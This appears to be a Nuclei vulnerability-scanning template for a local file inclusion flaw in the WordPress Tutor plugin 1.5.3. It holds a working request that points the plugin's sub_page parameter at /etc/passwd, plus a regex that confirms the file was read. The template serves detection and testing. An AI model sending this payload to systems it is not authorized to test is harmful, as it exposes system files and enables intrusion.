19 lines
438 B
YAML
19 lines
438 B
YAML
id: wp-tutor-lfi
|
|
|
|
info:
|
|
name: WordPress Plugin tutor.1.5.3 - Local File Inclusion
|
|
author: 0x240x23elu
|
|
severity: high
|
|
reference: https://www.exploit-db.com/exploits/48058
|
|
tags: wordpress,wp-plugin,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd"
|
|
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
part: body |